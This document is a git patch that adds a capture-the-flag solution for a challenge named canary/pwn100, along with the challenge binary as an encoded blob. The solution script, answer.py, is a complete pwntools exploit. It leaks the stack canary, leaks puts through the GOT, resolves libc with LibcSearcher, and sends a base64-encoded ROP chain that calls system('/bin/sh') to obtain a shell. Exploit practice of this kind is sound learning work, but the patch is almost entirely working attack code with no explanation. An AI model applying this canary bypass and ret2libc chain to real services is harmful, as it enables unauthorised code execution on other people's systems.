From 15ab81a884b7d07c9fa08ff30e6d01843d66b2c5 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Fri, 10 Sep 2021 13:39:08 +0800 Subject: [PATCH] Finished canary/pwn100 --- canary/pwn100/answer.py | 52 ++++++++++++++++++++++++++++++++++++++++ canary/pwn100/pwns | Bin 0 -> 5592 bytes canary/pwn100/test.py | 29 ++++++++++++++++++++++ canary/pwn100/test.txt | 2 ++ 4 files changed, 83 insertions(+) create mode 100644 canary/pwn100/answer.py create mode 100755 canary/pwn100/pwns create mode 100644 canary/pwn100/test.py create mode 100644 canary/pwn100/test.txt diff --git a/canary/pwn100/answer.py b/canary/pwn100/answer.py new file mode 100644 index 0000000..ab0806c --- /dev/null +++ b/canary/pwn100/answer.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64 +context(arch = "i386",os = "linux", log_level = "debug") + +p = process('./pwns') +elf = ELF('./pwns') + +# Canary Leak +p.recvuntil("May be I can know if you give me some data[Y/N]\n") +confirm = "Y" +p.sendline(confirm) +p.recvuntil("Give me some datas:\n\n") + +canary_payload = 257*'0' + '0' +canary_payload = base64.b64encode(canary_payload) +p.sendline(canary_payload) +p.recv(0x10b) +canary_value = u32(p.recv(4)) - 0x30 +print("Canary: " + hex(canary_value)) + +# puts .got address leak +p.recvuntil("May be I can know if you give me some data[Y/N]\n") +p.sendline(confirm) +p.recvuntil("Give me some datas:\n\n") + +puts_plt = elf.plt['puts'] +puts_got = elf.got['puts'] +b64decode_func = 0x080487e6 +puts_leak_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(puts_plt) + p32(b64decode_func) + p32(puts_got) +puts_leak_payload = base64.b64encode(puts_leak_payload) +p.sendline(puts_leak_payload) + +p.recvuntil("Result is:\n") +puts_libc = u32(p.recv(4)) + +# Query LibcSearcher +libc = LibcSearcher('puts', puts_libc) +libc_base = puts_libc - libc.dump('puts') +system_libc = libc_base + libc.dump('system') +binsh_libc = libc_base + libc.dump('str_bin_sh') + +# ROP to Shell +retn_addr = 0x08048c27 +p.recvuntil("Give me some datas:\n\n") +shell_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(system_libc) + p32(b64decode_func) + p32(binsh_libc) +shell_payload = base64.b64encode(shell_payload) +p.sendline(shell_payload) + +p.interactive() diff --git a/canary/pwn100/pwns b/canary/pwn100/pwns new file mode 100755 index 0000000000000000000000000000000000000000..f971a75eee35bd3e86ce3202dff19d6b3d009ccd GIT binary patch literal 5592 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 um$9&Y#>X$f4)CfB610-fe*#T^)p<